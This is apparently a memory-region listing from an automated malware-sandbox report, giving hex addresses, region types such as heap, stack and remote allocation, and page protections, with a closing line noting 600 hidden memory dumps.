||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
197C3B18000
|
trusted library allocation
|
page read and write
|
||
|
349F000
|
stack
|
page read and write
|
||
|
5FC1000
|
trusted library allocation
|
page read and write
|
||
|
4FB0000
|
heap
|
page read and write
|
||
|
7FFD344E0000
|
trusted library allocation
|
page read and write
|
||
|
4D4E000
|
stack
|
page read and write
|
||
|
9E75000
|
heap
|
page read and write
|
||
|
197C1BC0000
|
trusted library section
|
page read and write
|
||
|
A140000
|
direct allocation
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
A160000
|
direct allocation
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
7AF6000
|
heap
|
page read and write
|
||
|
4CC0000
|
trusted library allocation
|
page read and write
|
||
|
3450000
|
heap
|
page read and write
|
||
|
1D124C9F000
|
heap
|
page read and write
|
||
|
1D124C8E000
|
heap
|
page read and write
|
||
|
8D1E000
|
stack
|
page read and write
|
||
|
1D124C98000
|
heap
|
page read and write
|
||
|
2F18000
|
stack
|
page read and write
|
||
|
7FFD347A0000
|
trusted library allocation
|
page read and write
|
||
|
1F7315E0000
|
heap
|
page read and write
|
||
|
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
|
2A0C000
|
heap
|
page read and write
|
||
|
197DBC20000
|
trusted library allocation
|
page read and write
|
||
|
197C3DE3000
|
trusted library allocation
|
page read and write
|
||
|
197C3AF5000
|
trusted library allocation
|
page read and write
|
||
|
197DB980000
|
heap
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
1D124CA5000
|
heap
|
page read and write
|
||
|
197C1A9D000
|
heap
|
page read and write
|
||
|
197C1C05000
|
heap
|
page read and write
|
||
|
7FFD34730000
|
trusted library allocation
|
page read and write
|
||
|
293D000
|
stack
|
page read and write
|
||
|
1D124B4C000
|
heap
|
page read and write
|
||
|
1D124C31000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
1F810F60000
|
heap
|
page read and write
|
||
|
197C54C1000
|
trusted library allocation
|
page read and write
|
||
|
4ECE000
|
stack
|
page read and write
|
||
|
A0DE000
|
stack
|
page read and write
|
||
|
1D124C61000
|
heap
|
page read and write
|
||
|
A1B0000
|
direct allocation
|
page read and write
|
||
|
7D80000
|
trusted library allocation
|
page read and write
|
||
|
1D124C98000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
A1D0000
|
direct allocation
|
page read and write
|
||
|
197C4EF7000
|
trusted library allocation
|
page read and write
|
||
|
1D124B54000
|
heap
|
page read and write
|
||
|
A017000
|
heap
|
page read and write
|
||
|
2557D000
|
stack
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
9780000
|
direct allocation
|
page execute and read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
197C5419000
|
trusted library allocation
|
page read and write
|
||
|
197C3865000
|
trusted library allocation
|
page read and write
|
||
|
1D124D8B000
|
heap
|
page read and write
|
||
|
2D4E000
|
stack
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
1F72FC18000
|
heap
|
page read and write
|
||
|
7FFD345E1000
|
trusted library allocation
|
page read and write
|
||
|
4FC1000
|
trusted library allocation
|
page read and write
|
||
|
197C1A50000
|
heap
|
page read and write
|
||
|
255FE000
|
stack
|
page read and write
|
||
|
4CE5000
|
trusted library allocation
|
page execute and read and write
|
||
|
197C1C00000
|
heap
|
page read and write
|
||
|
89A1000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
1D124B48000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
50BF000
|
stack
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
7470000
|
direct allocation
|
page read and write
|
||
|
1D122D8C000
|
heap
|
page read and write
|
||
|
197DBC7C000
|
heap
|
page read and write
|
||
|
1D124B53000
|
heap
|
page read and write
|
||
|
197C1A5C000
|
heap
|
page read and write
|
||
|
5808000
|
trusted library allocation
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
324B000
|
heap
|
page read and write
|
||
|
197C1C70000
|
trusted library allocation
|
page read and write
|
||
|
7677000
|
heap
|
page read and write
|
||
|
197C1A30000
|
heap
|
page read and write
|
||
|
197C1CC0000
|
heap
|
page read and write
|
||
|
197D3661000
|
trusted library allocation
|
page read and write
|
||
|
197C3AFF000
|
trusted library allocation
|
page read and write
|
||
|
1D124C80000
|
heap
|
page read and write
|
||
|
1D124C67000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
8D70000
|
trusted library allocation
|
page read and write
|
||
|
747E000
|
remote allocation
|
page execute and read and write
|
||
|
1D124C9F000
|
heap
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
1F72FB70000
|
heap
|
page read and write
|
||
|
332F000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
1D124CB2000
|
heap
|
page read and write
|
||
|
1D122D56000
|
heap
|
page read and write
|
||
|
746A000
|
stack
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
7FFD34780000
|
trusted library allocation
|
page read and write
|
||
|
1D124720000
|
remote allocation
|
page read and write
|
||
|
4CB0000
|
trusted library allocation
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
2EDC000
|
stack
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
7B20000
|
trusted library allocation
|
page read and write
|
||
|
1D124CA5000
|
heap
|
page read and write
|
||
|
1D124C9F000
|
heap
|
page read and write
|
||
|
197C3596000
|
heap
|
page execute and read and write
|
||
|
D51E000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
2563F000
|
stack
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
1D124C67000
|
heap
|
page read and write
|
||
|
75A0000
|
direct allocation
|
page read and write
|
||
|
7420000
|
heap
|
page execute and read and write
|
||
|
4E8D000
|
stack
|
page read and write
|
||
|
A023000
|
heap
|
page read and write
|
||
|
1D124D8A000
|
heap
|
page read and write
|
||
|
7A19000
|
heap
|
page read and write
|
||
|
1D124B31000
|
heap
|
page read and write
|
||
|
197C3474000
|
heap
|
page read and write
|
||
|
197C54AE000
|
trusted library allocation
|
page read and write
|
||
|
7B6D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34612000
|
trusted library allocation
|
page read and write
|
||
|
197C1A94000
|
heap
|
page read and write
|
||
|
197C1C10000
|
heap
|
page readonly
|
||
|
89BB000
|
heap
|
page read and write
|
||
|
8071000
|
remote allocation
|
page execute and read and write
|
||
|
9F8E000
|
stack
|
page read and write
|
||
|
87B0000
|
trusted library allocation
|
page read and write
|
||
|
1D124CAB000
|
heap
|
page read and write
|
||
|
197C1A65000
|
heap
|
page read and write
|
||
|
1D124B34000
|
heap
|
page read and write
|
||
|
1D124C86000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
333F000
|
heap
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
6144000
|
trusted library allocation
|
page read and write
|
||
|
9471000
|
remote allocation
|
page execute and read and write
|
||
|
A000000
|
heap
|
page read and write
|
||
|
25750000
|
remote allocation
|
page read and write
|
||
|
197DB9D0000
|
heap
|
page read and write
|
||
|
1D124B31000
|
heap
|
page read and write
|
||
|
7A7E000
|
heap
|
page read and write
|
||
|
5021000
|
trusted library allocation
|
page read and write
|
||
|
197C1ADC000
|
heap
|
page read and write
|
||
|
740D000
|
stack
|
page read and write
|
||
|
197C3641000
|
trusted library allocation
|
page read and write
|
||
|
A240000
|
heap
|
page read and write
|
||
|
7680000
|
heap
|
page read and write
|
||
|
7FFD34760000
|
trusted library allocation
|
page read and write
|
||
|
197C1A92000
|
heap
|
page read and write
|
||
|
A11F000
|
stack
|
page read and write
|
||
|
197C1BF0000
|
trusted library allocation
|
page read and write
|
||
|
5BC72B6000
|
stack
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
885F000
|
stack
|
page read and write
|
||
|
A120000
|
heap
|
page readonly
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
A01E000
|
heap
|
page read and write
|
||
|
1D124B31000
|
heap
|
page read and write
|
||
|
A23E000
|
stack
|
page read and write
|
||
|
A1E0000
|
direct allocation
|
page read and write
|
||
|
5BC723E000
|
stack
|
page read and write
|
||
|
197D3931000
|
trusted library allocation
|
page read and write
|
||
|
7DA0000
|
trusted library allocation
|
page read and write
|
||
|
197C1C30000
|
heap
|
page execute and read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
4CBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
9FE3000
|
heap
|
page read and write
|
||
|
7490000
|
direct allocation
|
page read and write
|
||
|
197C3B07000
|
trusted library allocation
|
page read and write
|
||
|
4DB8000
|
trusted library allocation
|
page read and write
|
||
|
5BC6B43000
|
stack
|
page read and write
|
||
|
197DBC00000
|
heap
|
page execute and read and write
|
||
|
1D124C8E000
|
heap
|
page read and write
|
||
|
6A7E000
|
remote allocation
|
page execute and read and write
|
||
|
7CC0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4CDA000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
1D124C58000
|
heap
|
page read and write
|
||
|
601E000
|
trusted library allocation
|
page read and write
|
||
|
4CE2000
|
trusted library allocation
|
page read and write
|
||
|
4CB4000
|
trusted library allocation
|
page read and write
|
||
|
1D124B54000
|
heap
|
page read and write
|
||
|
AF19AF000
|
stack
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
4CD0000
|
trusted library allocation
|
page read and write
|
||
|
197C3EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34600000
|
trusted library allocation
|
page execute and read and write
|
||
|
8890000
|
trusted library allocation
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
7FFD34440000
|
trusted library allocation
|
page read and write
|
||
|
2585B000
|
stack
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
991E000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD34790000
|
trusted library allocation
|
page read and write
|
||
|
197DBA27000
|
heap
|
page read and write
|
||
|
7BEE000
|
stack
|
page read and write
|
||
|
7A00000
|
heap
|
page read and write
|
||
|
74E0000
|
direct allocation
|
page read and write
|
||
|
197C3B6B000
|
trusted library allocation
|
page read and write
|
||
|
197DBB20000
|
heap
|
page read and write
|
||
|
7FFD34550000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D124C9F000
|
heap
|
page read and write
|
||
|
588B000
|
stack
|
page read and write
|
||
|
5BC74BE000
|
stack
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
521E000
|
stack
|
page read and write
|
||
|
1D124DAF000
|
heap
|
page read and write
|
||
|
197C1C20000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345D0000
|
trusted library allocation
|
page read and write
|
||
|
5BC800E000
|
stack
|
page read and write
|
||
|
7FFD34432000
|
trusted library allocation
|
page read and write
|
||
|
1D124720000
|
remote allocation
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
4D00000
|
trusted library allocation
|
page read and write
|
||
|
74B0000
|
direct allocation
|
page read and write
|
||
|
32F8000
|
heap
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
283D000
|
stack
|
page read and write
|
||
|
8C5C000
|
stack
|
page read and write
|
||
|
5BC71F9000
|
stack
|
page read and write
|
||
|
5BC753E000
|
stack
|
page read and write
|
||
|
A190000
|
direct allocation
|
page read and write
|
||
|
1D124C85000
|
heap
|
page read and write
|
||
|
7DF4A3EF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
327D000
|
heap
|
page read and write
|
||
|
7FFD344E6000
|
trusted library allocation
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
1D124CA5000
|
heap
|
page read and write
|
||
|
8E20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FDF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D124B54000
|
heap
|
page read and write
|
||
|
2553D000
|
stack
|
page read and write
|
||
|
7480000
|
direct allocation
|
page read and write
|
||
|
197C1C40000
|
trusted library allocation
|
page read and write
|
||
|
1D122E48000
|
heap
|
page read and write
|
||
|
1F810F8B000
|
heap
|
page read and write
|
||
|
323F000
|
stack
|
page read and write
|
||
|
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
|
56CF000
|
stack
|
page read and write
|
||
|
7FFD34670000
|
trusted library allocation
|
page read and write
|
||
|
5BC818B000
|
stack
|
page read and write
|
||
|
197C54A9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
8915000
|
trusted library allocation
|
page read and write
|
||
|
29D0000
|
heap
|
page read and write
|
||
|
1D122D11000
|
heap
|
page read and write
|
||
|
25650000
|
heap
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
B7D05FE000
|
unkown
|
page read and write
|
||
|
1F810F80000
|
heap
|
page read and write
|
||
|
7911000
|
heap
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
89F9000
|
heap
|
page read and write
|
||
|
1D122E4A000
|
heap
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page read and write
|
||
|
AD1E000
|
direct allocation
|
page execute and read and write
|
||
|
7D20000
|
trusted library allocation
|
page read and write
|
||
|
7D60000
|
trusted library allocation
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
25A40000
|
heap
|
page read and write
|
||
|
1D124C98000
|
heap
|
page read and write
|
||
|
A023000
|
heap
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
197C1BB0000
|
trusted library section
|
page read and write
|
||
|
8D80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34750000
|
trusted library allocation
|
page read and write
|
||
|
197DBC3C000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
1F72FB50000
|
heap
|
page read and write
|
||
|
7FFD3443D000
|
trusted library allocation
|
page execute and read and write
|
||
|
197DBC86000
|
heap
|
page read and write
|
||
|
7A23000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
1D124C80000
|
heap
|
page read and write
|
||
|
197DBFC0000
|
heap
|
page read and write
|
||
|
8980000
|
heap
|
page read and write
|
||
|
1D124720000
|
remote allocation
|
page read and write
|
||
|
895E000
|
stack
|
page read and write
|
||
|
197DBC30000
|
heap
|
page read and write
|
||
|
7FFD34516000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
7D40000
|
trusted library allocation
|
page read and write
|
||
|
4DA0000
|
heap
|
page execute and read and write
|
||
|
8C9C000
|
stack
|
page read and write
|
||
|
8970000
|
heap
|
page read and write
|
||
|
4E20000
|
trusted library allocation
|
page read and write
|
||
|
A150000
|
direct allocation
|
page read and write
|
||
|
B7D04FD000
|
stack
|
page read and write
|
||
|
766B000
|
stack
|
page read and write
|
||
|
197DBB23000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
32BA000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
|
344D000
|
stack
|
page read and write
|
||
|
7ADC000
|
heap
|
page read and write
|
||
|
197C1AB2000
|
heap
|
page read and write
|
||
|
197C1AA3000
|
heap
|
page read and write
|
||
|
333A000
|
heap
|
page read and write
|
||
|
345E000
|
stack
|
page read and write
|
||
|
564E000
|
stack
|
page read and write
|
||
|
7BA0000
|
trusted library allocation
|
page read and write
|
||
|
197C3EC5000
|
trusted library allocation
|
page read and write
|
||
|
197C1950000
|
heap
|
page read and write
|
||
|
2547F000
|
stack
|
page read and write
|
||
|
1D124CA2000
|
heap
|
page read and write
|
||
|
197C543B000
|
trusted library allocation
|
page read and write
|
||
|
4F8F000
|
stack
|
page read and write
|
||
|
34BC000
|
heap
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
568E000
|
stack
|
page read and write
|
||
|
197C4AAE000
|
trusted library allocation
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
2F1D000
|
stack
|
page read and write
|
||
|
9E60000
|
heap
|
page read and write
|
||
|
DF1E000
|
direct allocation
|
page execute and read and write
|
||
|
197DB986000
|
heap
|
page read and write
|
||
|
197C5452000
|
trusted library allocation
|
page read and write
|
||
|
9E5E000
|
stack
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
197C3B2D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345EA000
|
trusted library allocation
|
page read and write
|
||
|
197DBC88000
|
heap
|
page read and write
|
||
|
1D124B40000
|
heap
|
page read and write
|
||
|
197D3922000
|
trusted library allocation
|
page read and write
|
||
|
197C3630000
|
heap
|
page read and write
|
||
|
3342000
|
heap
|
page read and write
|
||
|
8880000
|
trusted library allocation
|
page read and write
|
||
|
5FE9000
|
trusted library allocation
|
page read and write
|
||
|
8A71000
|
remote allocation
|
page execute and read and write
|
||
|
1D124B54000
|
heap
|
page read and write
|
||
|
8D90000
|
trusted library allocation
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
8DA0000
|
trusted library allocation
|
page read and write
|
||
|
1D124C98000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
4C80000
|
trusted library section
|
page read and write
|
||
|
762D000
|
stack
|
page read and write
|
||
|
881D000
|
stack
|
page read and write
|
||
|
2A00000
|
heap
|
page read and write
|
||
|
1D124C85000
|
heap
|
page read and write
|
||
|
752D000
|
stack
|
page read and write
|
||
|
4DBB000
|
trusted library allocation
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
35CE000
|
stack
|
page read and write
|
||
|
1D124B54000
|
heap
|
page read and write
|
||
|
7A1F000
|
heap
|
page read and write
|
||
|
A007000
|
heap
|
page read and write
|
||
|
4CA0000
|
trusted library allocation
|
page read and write
|
||
|
5BC6F7E000
|
stack
|
page read and write
|
||
|
1D124C63000
|
heap
|
page read and write
|
||
|
197C1B50000
|
heap
|
page read and write
|
||
|
197C3AEB000
|
trusted library allocation
|
page read and write
|
||
|
3455000
|
heap
|
page read and write
|
||
|
1D124B37000
|
heap
|
page read and write
|
||
|
1D125126000
|
heap
|
page read and write
|
||
|
8CDB000
|
stack
|
page read and write
|
||
|
5BC7FC3000
|
stack
|
page read and write
|
||
|
1D124C8E000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
40E0000
|
remote allocation
|
page execute and read and write
|
||
|
74D0000
|
direct allocation
|
page read and write
|
||
|
1D124C80000
|
heap
|
page read and write
|
||
|
1F72FBF5000
|
heap
|
page read and write
|
||
|
7AE5000
|
heap
|
page read and write
|
||
|
197DBCC5000
|
heap
|
page read and write
|
||
|
7D90000
|
trusted library allocation
|
page read and write
|
||
|
A130000
|
direct allocation
|
page read and write
|
||
|
2578E000
|
stack
|
page read and write
|
||
|
1F810F65000
|
heap
|
page read and write
|
||
|
1F72FA70000
|
heap
|
page read and write
|
||
|
2FA8000
|
heap
|
page read and write
|
||
|
197DBC23000
|
trusted library allocation
|
page read and write
|
||
|
8DC0000
|
direct allocation
|
page read and write
|
||
|
7D50000
|
trusted library allocation
|
page read and write
|
||
|
1D122E49000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
197C1CC5000
|
heap
|
page read and write
|
||
|
7C2E000
|
stack
|
page read and write
|
||
|
A180000
|
direct allocation
|
page read and write
|
||
|
8870000
|
trusted library allocation
|
page execute and read and write
|
||
|
899A000
|
heap
|
page read and write
|
||
|
78DE000
|
stack
|
page read and write
|
||
|
74C0000
|
direct allocation
|
page read and write
|
||
|
8777000
|
stack
|
page read and write
|
||
|
4F4E000
|
stack
|
page read and write
|
||
|
36B0000
|
heap
|
page read and write
|
||
|
A05C000
|
heap
|
page read and write
|
||
|
50E0000
|
heap
|
page read and write
|
||
|
2FA0000
|
heap
|
page read and write
|
||
|
197C36C2000
|
trusted library allocation
|
page read and write
|
||
|
2980000
|
heap
|
page read and write
|
||
|
89D3000
|
heap
|
page read and write
|
||
|
1D125222000
|
heap
|
page read and write
|
||
|
1D122CFB000
|
heap
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
7C6E000
|
stack
|
page read and write
|
||
|
1D122E48000
|
heap
|
page read and write
|
||
|
5BC707E000
|
stack
|
page read and write
|
||
|
737F000
|
stack
|
page read and write
|
||
|
7FFD34680000
|
trusted library allocation
|
page read and write
|
||
|
A1A0000
|
direct allocation
|
page read and write
|
||
|
A1C0000
|
direct allocation
|
page read and write
|
||
|
1F811080000
|
heap
|
page read and write
|
||
|
197C3590000
|
heap
|
page execute and read and write
|
||
|
7D30000
|
trusted library allocation
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
197C546C000
|
trusted library allocation
|
page read and write
|
||
|
197C1B90000
|
heap
|
page read and write
|
||
|
4D90000
|
heap
|
page readonly
|
||
|
529E000
|
stack
|
page read and write
|
||
|
7FFD344F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
332B000
|
heap
|
page read and write
|
||
|
4E48000
|
heap
|
page read and write
|
||
|
1D124C61000
|
heap
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
51DC000
|
stack
|
page read and write
|
||
|
1D122D8C000
|
heap
|
page read and write
|
||
|
E91E000
|
direct allocation
|
page execute and read and write
|
||
|
29CE000
|
unkown
|
page read and write
|
||
|
7425000
|
heap
|
page execute and read and write
|
||
|
329A000
|
stack
|
page read and write
|
||
|
1D124C8E000
|
heap
|
page read and write
|
||
|
331F000
|
heap
|
page read and write
|
||
|
2FF0000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
8960000
|
trusted library allocation
|
page execute and read and write
|
||
|
7B90000
|
heap
|
page execute and read and write
|
||
|
4E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
1D125127000
|
heap
|
page read and write
|
||
|
197C543F000
|
trusted library allocation
|
page read and write
|
||
|
197C1ADA000
|
heap
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
6149000
|
trusted library allocation
|
page read and write
|
||
|
427E000
|
remote allocation
|
page execute and read and write
|
||
|
197C3B6F000
|
trusted library allocation
|
page read and write
|
||
|
1D122E4D000
|
heap
|
page read and write
|
||
|
197C1BD0000
|
trusted library allocation
|
page read and write
|
||
|
8A1E000
|
heap
|
page read and write
|
||
|
8780000
|
heap
|
page read and write
|
||
|
1D124F31000
|
heap
|
page read and write
|
||
|
7FFD34433000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A09000
|
heap
|
page read and write
|
||
|
507E000
|
stack
|
page read and write
|
||
|
8790000
|
trusted library allocation
|
page execute and read and write
|
There are 600 hidden memdumps, click here to show them.